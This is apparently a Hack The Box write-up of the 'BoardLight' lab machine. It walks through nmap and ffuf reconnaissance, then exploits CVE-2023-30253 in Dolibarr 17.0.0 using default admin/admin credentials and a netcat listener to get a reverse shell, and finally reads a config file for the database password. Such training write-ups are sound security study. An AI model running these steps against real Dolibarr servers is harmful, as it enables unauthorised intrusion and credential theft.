> For the complete documentation index, see [llms.txt](https://h3ckt0r.gitbook.io/0xsec/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://h3ckt0r.gitbook.io/0xsec/offensive-security/oscp/writeups/htb/boardlight.md).

# BoardLight

**Date:** 14, jun, 2024

**Author:** H3cktor

### Recon

**Using NMAP to make Recon**&#x20;

```bash
nmap -sC -sV 10.10.11.11
```

-sV => Attempts to determine the version of the service running on port

-sC  => Scan with default NSE scripts. Considered useful for discovery and safe

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F6RyKJYpAtJykJROtTd5T%2Fimage.png?alt=media&amp;token=4dd153ae-1b39-49dc-949b-923e6f096ed4" alt=""><figcaption></figcaption></figure>

After the **nmap** scan we can see an apache server listening on port 80:

Lets add this to our host file:

```bash
sudo nano /etc/hosts
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F1CPDamNbyAUkKaRjdYuP%2Fimage.png?alt=media&amp;token=57fca21c-b9f6-4a86-bc77-b11394d16688" alt=""><figcaption></figcaption></figure>

Lets first try to do a directory search to try to find any hidden files/**directory's**. I will use **gobuster**  to do this:

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FSpRKIBjc662mWRLivb0Z%2Fimage.png?alt=media&amp;token=c3ffacd4-a31d-4f16-8334-c3ea9a016e02" alt=""><figcaption></figcaption></figure>

Make subdomain enumeration Using **FFUF**

```bash
ffuf -H "Host: FUZZ.board.htb"  -u http://10.10.11.11/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt  -fw 6243

```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FIRItxRVEwzWG7oI3dTlT%2Fimage.png?alt=media&amp;token=30029ec9-fed1-4de7-bf5d-7d7c0fb30e5b" alt=""><figcaption></figcaption></figure>

See i found the Subdomain crm.10.10.11.11

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F1CPDamNbyAUkKaRjdYuP%2Fimage.png?alt=media&amp;token=57fca21c-b9f6-4a86-bc77-b11394d16688" alt=""><figcaption></figcaption></figure>

**I Found the crm  panel**

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FKS5Yzr0LwlpXM4B9aKCU%2Fimage.png?alt=media&amp;token=311f550a-1e08-44a9-8e98-a3595b5c6739" alt=""><figcaption></figcaption></figure>

Ok Now Found the Dolibarr version 17.0.0 and i Search in Google to get any CVE&#x20;

i found [Dolibarr-17.0.0-CVE-2023-30253](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253)

Reverse Shell POC exploit for **`Dolibarr <= 17.0.0 (CVE-2023-30253)`**, PHP Code Injection

```bash
sudo python3 exploit.py   http://crm.board.htb admin admin  <ip Your tun0> 9000

```

listen revers shell => Must run listening in First

```
nc -nvlp 9000
```

\
First I provided a listener and then executed the exploit.py file. Then I provided the credentials as well as my attacker ip and the listening port. After executing, I successfully got a reverse shell

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2Fok6KdZk0kOCvmfuMPgPL%2Fimage.png?alt=media&amp;token=fba88efe-26e7-41d5-909f-3bfcf4db7072" alt=""><figcaption></figcaption></figure>

B0000000M!

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FQy0Il8iK1md27jitP4b7%2Fimage.png?alt=media&amp;token=1b4033ba-4a7a-45b2-9121-d419a43cba3d" alt=""><figcaption></figcaption></figure>

I cat Found in pass or Cardantional&#x20;

put i see the user name larissa

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FjIXuETQGPiejTBFESHRW%2Fimage.png?alt=media&amp;token=1361b8d1-3de5-4a8d-8826-7733857e45de" alt=""><figcaption></figcaption></figure>

I found the main database password in the file.

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F3enShYSMM8Llj058lNlZ%2Fimage.png?alt=media&amp;token=35b90816-28f8-4e50-bbe4-078610f81b24" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FG8nrkgNgVC8G4Xx8S5mr%2Fimage.png?alt=media&amp;token=1949414f-e25f-4461-b275-f23724255ccc" alt=""><figcaption><p>User Own</p></figcaption></figure>
